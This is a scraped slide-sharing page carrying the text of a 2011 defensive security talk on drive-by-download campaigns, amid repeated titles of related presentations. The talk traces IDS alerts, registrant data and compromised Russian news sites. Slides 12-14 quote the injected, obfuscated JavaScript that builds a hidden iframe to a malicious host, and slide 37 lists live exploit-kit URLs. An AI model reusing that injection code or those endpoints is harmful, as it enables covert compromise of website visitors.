Oracle API Gateway Installation
Oracle API Gateway InstallationOracle API Gateway Installation
Oracle API Gateway Installation
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / Webgrind
 
Nginx pres
Nginx presNginx pres
Nginx pres
 
Bpstudy20101221
Bpstudy20101221Bpstudy20101221
Bpstudy20101221
 
Python at Facebook
Python at FacebookPython at Facebook
Python at Facebook
 
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & Tools
 
NLIT 2011: Chef & Capistrano
NLIT 2011: Chef & CapistranoNLIT 2011: Chef & Capistrano
NLIT 2011: Chef & Capistrano
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php Presentation
 

Más de Sergey Soldatov

Metrics in Security Operations
Metrics in Security OperationsMetrics in Security Operations
Metrics in Security OperationsSergey Soldatov
 
Сколько надо SOC?
Сколько надо SOC?Сколько надо SOC?
Сколько надо SOC?Sergey Soldatov
 
От мониторинга к форенсике и обратно
От мониторинга к форенсике и обратноОт мониторинга к форенсике и обратно
От мониторинга к форенсике и обратноSergey Soldatov
 
Роботы среди нас!
Роботы среди нас!Роботы среди нас!
Роботы среди нас!Sergey Soldatov
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Практика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыПрактика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыSergey Soldatov
 
Reducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationReducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationSergey Soldatov
 
Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protectionSergey Soldatov
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Трудовые будни охотника на угрозы
Трудовые будни охотника на угрозыТрудовые будни охотника на угрозы
Трудовые будни охотника на угрозыSergey Soldatov
 
Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Sergey Soldatov
 
Threat hunting as SOC process
Threat hunting as SOC processThreat hunting as SOC process
Threat hunting as SOC processSergey Soldatov
 
Мониторинг своими руками
Мониторинг своими рукамиМониторинг своими руками
Мониторинг своими рукамиSergey Soldatov
 
модульный под к документир V5
модульный под к документир V5модульный под к документир V5
модульный под к документир V5Sergey Soldatov
 
IDM - это непросто!
IDM - это непросто!IDM - это непросто!
IDM - это непросто!Sergey Soldatov
 
Некриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей православной криптографииНекриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей православной криптографииSergey Soldatov
 
Opensource vs. Non-opensource
Opensource vs. Non-opensourceOpensource vs. Non-opensource
Opensource vs. Non-opensourceSergey Soldatov
 
Примерные критерии оценки IDM
Примерные критерии оценки IDMПримерные критерии оценки IDM
Примерные критерии оценки IDMSergey Soldatov
 

Más de Sergey Soldatov (20)

Metrics in Security Operations
Metrics in Security OperationsMetrics in Security Operations
Metrics in Security Operations
 
Сколько надо SOC?
Сколько надо SOC?Сколько надо SOC?
Сколько надо SOC?
 
От мониторинга к форенсике и обратно
От мониторинга к форенсике и обратноОт мониторинга к форенсике и обратно
От мониторинга к форенсике и обратно
 
Роботы среди нас!
Роботы среди нас!Роботы среди нас!
Роботы среди нас!
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Практика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыПрактика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструменты
 
Reducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationReducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformation
 
Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protection
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Трудовые будни охотника на угрозы
Трудовые будни охотника на угрозыТрудовые будни охотника на угрозы
Трудовые будни охотника на угрозы
 
Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016
 
Threat hunting as SOC process
Threat hunting as SOC processThreat hunting as SOC process
Threat hunting as SOC process
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Мониторинг своими руками
Мониторинг своими рукамиМониторинг своими руками
Мониторинг своими руками
 
Вопросы к DLP
Вопросы к DLPВопросы к DLP
Вопросы к DLP
 
модульный под к документир V5
модульный под к документир V5модульный под к документир V5
модульный под к документир V5
 
IDM - это непросто!
IDM - это непросто!IDM - это непросто!
IDM - это непросто!
 
Некриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей православной криптографииНекриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей православной криптографии
 
Opensource vs. Non-opensource
Opensource vs. Non-opensourceOpensource vs. Non-opensource
Opensource vs. Non-opensource
 
Примерные критерии оценки IDM
Примерные критерии оценки IDMПримерные критерии оценки IDM
Примерные критерии оценки IDM
 

Último

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 

Último (20)

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 

Drive-By Download Evolution and Detection After Vulnerability Disclosure

  • 1. Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure Vladimir B. Kropotov TBINFORM (TNK-BP Group)
  • 2. Drive-By-Download • Hackers distribute malware by "poisoning" legitimate websites • Hacker injects malicious iframes into HTML content • Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used You just want information by attacker about insurance, nothing more, but…
  • 3. What does it look like? Host ready Malware Malware server controlled by attacker PC connected to the Internet Exploit OS, browser plugins, etc. INFO Exploit server controlled by attacker Known server with Intermediate server iframe controlled by attacker
  • 4. How we find it? Date/Time 2011-08-05 10:44:53 YEKST Tag Name PDF_XFA_Script Observance Type Intrusion Detection Cleared Flag false Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Target Service unknown Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eeb b038bd46a63e08665f308 1fb408/6cd14aca5927118 2c8a04159f9ad2804.pdf
  • 5. DOES USER NEED IT?? How we find it? Date/Time 2011-08-05 10:44:53 Tag Name PDF_XFA_Script Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eebb 038bd46a63e08665f3081 fb408/6cd14aca59271182 c8a04159f9ad2804.pdf
  • 6. First indicators Date/Time 2011-07-26 11:24:37 Tag Name PDF_XFA_Script arg 3592ba48df0fae9e5f5c5b09535a 070d0b04020600510f0c56075c0 6040750 compressed zlib server mamjhvbw.dyndns.pro URL /ghqlv3ym/
  • 7. First indicators Date/Time 2011-08-16 13:24:44 Tag Name ActiveX_Warning :clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server skipetar.in URL /jb/pda.js Date/Time 2011-08-18 19:00:13 Tag Name ActiveX_Warning clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server e1in.in URL /stat/574a353789f/pda.js
  • 8. First indicators Date/Time 2011-08-09 10:17:14 Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 compressed gzip server inaptly.in URL /jb/lastrger.php Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root :compressed gzip compressed zlib :server oligist.in server e1in.in URL /stat/574a353789f/lastrger.php :URL /jb/lastrger.php
  • 9. First indicators Date/Time 2011-07-26 11:24:37 Date/Time 2011-08-09 10:17:14 Date/Time 2011-08-16 13:24:44 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 Tag Name ActiveX_Warning compressed gzip :clsid CAFEEFAC-DEC7-0000-0000- arg 3592ba48df0fae9e5f5c5b09535a ABCDEFFEDCBA 070d0b04020600510f0c56075c0 server inaptly.in 6040750 compressed zlib server skipetar.in server mamjhvbw.dyndns.pro URL /jb/lastrger.php URL /jb/pda.js URL /ghqlv3ym/ Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name ActiveX_Warning Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root clsid CAFEEFAC-DEC7-0000-0000- :compressed gzip compressed zlib ABCDEFFEDCBA :server oligist.in server e1in.in server e1in.in URL /stat/574a353789f/lastrger.php URL /stat/574a353789f/pda.js :URL /jb/lastrger.php
  • 12. Example: o-strahovanie.ru SEP 02 / ============ bbb ============document.xmlSettings.if_ik=false;if(window.localS torage){ if(window.localStorage.if_ik){ if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true;}else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true; }if(document.xmlSettings.if_ik){ if(window.localStorage)window.localStorage.if_ik=docu ment.xmlSettings.time(); else document.xmlSettings.setCookie('if_ik',document.xmlSettings.ti me(),{ expires:(document.xmlSettings.time() + 86400*365) }); Cookie: document.xmlSettings.iframe=document.createElement ('iframe'); if_ik1315314771 document.xmlSettings.iframe.style.cssText='height:1px; www.o-strahovanie.ru/ position:absolute;width:1px;border:none;left:- 5000px;'; 16004293056256333102392 document.body.appendChild(document.xmlSettings.ifra 93001403230174358* me); document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'a rding.i'+'n/xtqd2/08.p'+'hp';}
  • 13. Example: o-strahovanie.ru / ============ bbb ============ else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ document.xmlSettings.iframe= document.createElement('iframe'); document.xmlSettings.iframe.style.cssText= 'height:1px;position:absolute;width:1px;border:none;left:-5000px;'; document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings. iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} Cookie: if_ik1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
  • 14. Example: o-strahovanie.ru else{// 4 osel … document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.iframe.src= 'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} iframe.src= 'http://disregarding.in/xtqd2/08.php'
  • 15. Drive By Download o-strahovanie.ru Sep 02 NO Host ready Malware Malware server PC connected to the Internet Exploit NO OS, browser plugins, etc. INFO Exploit server Known server with Intermediate server iframe disregarding.in
  • 16. Drive By Download o-strahovanie.ru Sep 12 Host ready Malware Malware server chamberwoman.in PC connected to janiculum.in the Internet Exploit OS, browser plugins, etc. INFO Exploit server chamberwoman.in janiculum.in Known server with Intermediate server iframe disregarding.in
  • 17. Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario
  • 18. Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario No Payload, because No Payload Requests? Are they looking for customers?
  • 19. Example: o-strahovanie.ru Domain ID:D5165642-AFIN Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name: Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
  • 20. Russell Rosario Domain Name:FILTRATED.IN filtrated.in Created On:14-Jul-2011 11:09:53 UTC Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN) Created On:14-Jul-2011 11:09:56 UTC Registrant ID:TS_16731618 raptnesses.in Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue Created On:14-Jul-2011 11:09:56 UTC Registrant City:Winter Haven Registrant State/Province:Florida tansies.in Registrant Postal Code:33830 Registrant Country:US Created On:14-Jul-2011 11:10:03 UTC Registrant Phone:+1.8635571308 Email:russellsrosario@teleworm.com But Sally Doesn't Know…
  • 21. Attack before public disclosure • Primary location for malicious sites: .IN • Physical servers location by IP-Address: Romania • Responsible person: Russell Rosario • Domains are new
  • 22. Domain owner is the same Domain Name Created On Registrant Name irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario 20-Jul-2011 Acrobat Vulnerability vendor notified
  • 23. Vulnerability reported to vendor VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability X. DISCLOSURE TIMELINE ----------------------------- 2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers 2011-09-14 - Public disclosure ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-26 - Coordinated public release of advisory ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-27 - Coordinated public release of advisory
  • 24. Harvetering machine started Domain Name Created On Registrant Name microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario
  • 25. But may be someone knows? • Spamlists • AV Vendors • Safebrowsing • Securityfocus
  • 29. Securityfocus Sep 07 Sent: Wednesday, September 07, 2011 11:31 PM Subject: There is a strange get request header in all web pages of my site? I'm worry about Trojan attack! Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa2 4nw91yhoszkdmoh413ywv6cp7"
  • 30. PDF vulnerabilities public disclosure Sep 14. What to expect?
  • 31. PDF vulnerabilities public disclosure Sep 14. What to expect? NO GOOD NEWS, JUST EPIC FAIL for site administrators
  • 32. No good news. Hundreds of domains were registered ITALIA-NEW.IN KLERK-EVEN.RU BANER-KLERK.RU KLERK-EVENTS.RU BANK-KLERK.RU KLERK-LAW.RU BANNER-KLERK.RU KLERK-NEW.RU BLOGS-KLERK.RU KLERK-NEWS.RU BUH-KLERK.RU KLERK-REKLAMA.RU DAILY-KP.RU KLERK-RU.RU FORUM-KLERK.RU KLERK-WORK.RU I-OBOZREVATEL.RU KLERK2.RU INTERFAX-REGION.RU OBOZREVATEL-RU.RU JOB-KLERK.RU OBOZREVATELRU.RU KLERK-BANK.RU WIKI-KLERK.RU KLERK-BANKIR.RU PRESS-RZD.RU KLERK-BIZ.RU RZD-RZD.RU KLERK-BOSS.RU IPGEOBASE.IN KLERK-BUH.RU ***
  • 33. “New generation” Host ready Malware Malware server controlled by attacker PC connected to Exploit the Internet OS, browser plugins, etc. INFO Exploit server controlled by attacker Intermediate server controlled by attacker Known server with Other known server iframe NOT controlled by attacker
  • 34. Attack after public disclosure • Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO,… • Physical servers location by IP-Address: International • Domains registered to different spurious persons • Domain lifetime ~ time to Blacklists appearance • Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique) • If you don't know exact malware URL, site redirects to well known server • Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
  • 35. Known sites examples: RZD.RU Russian rail roads
  • 37. Just TWO Domains, SURE? Domain URL interfax-rzd.in http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root rzd-interfax-online.in http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root news-rzdstyle.in http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root rzd-rzd.in http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root therzd-rzd.in http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1 press-rzd.in http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root rzd-press.in http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root rzd-banner.in http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root pass-rzd.in http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root rzd-ticket.in http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root
  • 38. Known sites examples: RZD.RU Russian rail roads
  • 40. Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
  • 42. Other examples: EG.RU (newspaper, 263 685 visits per day)
  • 43. Other examples: svpressa.ru (newspaper 276 720 visits per day)
  • 44. URA.RU (news 22 486 visits per day)
  • 45. URA.RU (news 22 486 visits per day)
  • 46. URA.RU (news 22 486 visits per day)
  • 47. Other examples: ria.ru (news 667 222 visits per day) Datetime [09/Nov/2011:12:26:45 +0300] Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0 IP 176.9.50.178 Site jya56yhsvcsss.com Referrer http://ria.ru/
  • 48. Other examples: inosmi.ru (news 175 361visits per day) Datetime [09/Nov/2011:12:28:10 +0300] Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.1 IP 176.9.50.178 Site jya56yhsvcsss.com Referrer http://inosmi.ru/
  • 49. Other examples: glavbukh.ru (15 200 visits per day) Datetime [09/Nov/2011:12:14:46 +0300] Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0 IP 176.9.50.178 Site jya56yhsvcsss.com Referrer http://www.glavbukh.ru/
  • 52. Another news, another phone… • Legal • Faked
  • 55. Malware examples 01ie.ru, 02ie.ru, 03ie.ru (Registered by reg.ru)
  • 56. Malware examples 01ie.ru, 02ie.ru, 03ie.ru (Registered by reg.ru)
  • 65. What can we do? • Patch endpoint • Tighten the Internet filtering (default deny if possible) • No Internet surfing with admin rights • See what’s happening (continuous monitoring) • Check if you’re well (regular technical audits) • Educate people
  • 66. Credits • Sergey V. Soldatov, TBINFORM (TNK-BP Group) • Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group) • Wayne Huang, ARMORIZE
